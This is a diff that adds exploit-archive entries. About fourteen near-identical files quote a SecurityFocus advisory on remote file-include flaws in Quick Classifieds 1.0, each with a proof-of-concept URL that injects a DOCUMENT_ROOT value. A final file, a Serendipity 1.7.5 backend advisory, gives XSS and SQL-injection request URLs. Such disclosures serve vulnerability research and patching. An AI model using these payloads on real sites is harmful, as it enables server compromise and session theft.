http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/createL.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31502.txt b/platforms/php/webapps/31502.txt new file mode 100755 index 000000000..fa6b4ae5a --- /dev/null +++ b/platforms/php/webapps/31502.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/createM.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31503.txt b/platforms/php/webapps/31503.txt new file mode 100755 index 000000000..c15f9b559 --- /dev/null +++ b/platforms/php/webapps/31503.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/createNews.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31504.txt b/platforms/php/webapps/31504.txt new file mode 100755 index 000000000..a72a7c39c --- /dev/null +++ b/platforms/php/webapps/31504.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/createP.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31505.txt b/platforms/php/webapps/31505.txt new file mode 100755 index 000000000..1c1d1f81c --- /dev/null +++ b/platforms/php/webapps/31505.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/createS.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31506.txt b/platforms/php/webapps/31506.txt new file mode 100755 index 000000000..37e060e22 --- /dev/null +++ b/platforms/php/webapps/31506.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/createT.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31507.txt b/platforms/php/webapps/31507.txt new file mode 100755 index 000000000..d0d8a8918 --- /dev/null +++ b/platforms/php/webapps/31507.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/index.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31508.txt b/platforms/php/webapps/31508.txt new file mode 100755 index 000000000..850de3f55 --- /dev/null +++ b/platforms/php/webapps/31508.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/mailadmin.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31509.txt b/platforms/php/webapps/31509.txt new file mode 100755 index 000000000..8b94b5c6d --- /dev/null +++ b/platforms/php/webapps/31509.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/setUp.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31510.txt b/platforms/php/webapps/31510.txt new file mode 100755 index 000000000..f17640818 --- /dev/null +++ b/platforms/php/webapps/31510.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/include/sendit.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31511.txt b/platforms/php/webapps/31511.txt new file mode 100755 index 000000000..4b81c3dbf --- /dev/null +++ b/platforms/php/webapps/31511.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/include/sendit2.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31512.txt b/platforms/php/webapps/31512.txt new file mode 100755 index 000000000..2076a7b16 --- /dev/null +++ b/platforms/php/webapps/31512.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/include/adminHead.inc?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31513.txt b/platforms/php/webapps/31513.txt new file mode 100755 index 000000000..96c09975f --- /dev/null +++ b/platforms/php/webapps/31513.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/include/usersHead.inc?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31514.txt b/platforms/php/webapps/31514.txt new file mode 100755 index 000000000..11712b63d --- /dev/null +++ b/platforms/php/webapps/31514.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/style/default.scheme.inc?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31516.txt b/platforms/php/webapps/31516.txt new file mode 100755 index 000000000..b1ed73f89 --- /dev/null +++ b/platforms/php/webapps/31516.txt @@ -0,0 +1,74 @@ +Advisory: Serendipity 1.7.5 (Backend) - Multiple security vulnerabilities +Advisory ID: SSCHADV2014-003 +Author: Stefan Schurtz +Affected Software: Successfully tested on Serendipity 1.7.5 +Vendor URL: http://www.s9y.org/ +Vendor Status: fixed + +========================== +Vulnerability Description +========================== + +The Serendipity 1.7.5 backend is prone to multiple security vulnerabilities + +========================== +PoC-Exploit +========================== + +// Stored-XSS with "Real name" + +(1) Login as "Standard editor" user +(2) Under "Personal Settings" set your "Real name" to "> + +The XSS will be executed for the Administrator if he manages the users (Backend -> Administration -> Manage users) + +// SQL-Injection - with "serendipity[install_plugin]" + +http://[target]/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=serendipity_event_spamblock&serendipity[install_plugin]=[SQLi] + +// Reflected XSS_1 - "serendipity[install_plugin]" + +http://[target]/s/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=&serendipity[install_plugin]=78524'%3b%2f%2f912 + +// Reflected XSS_2 - "serendipity[id]" + +POST http://[target]/serendipity/serendipity_admin.php? + +serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=">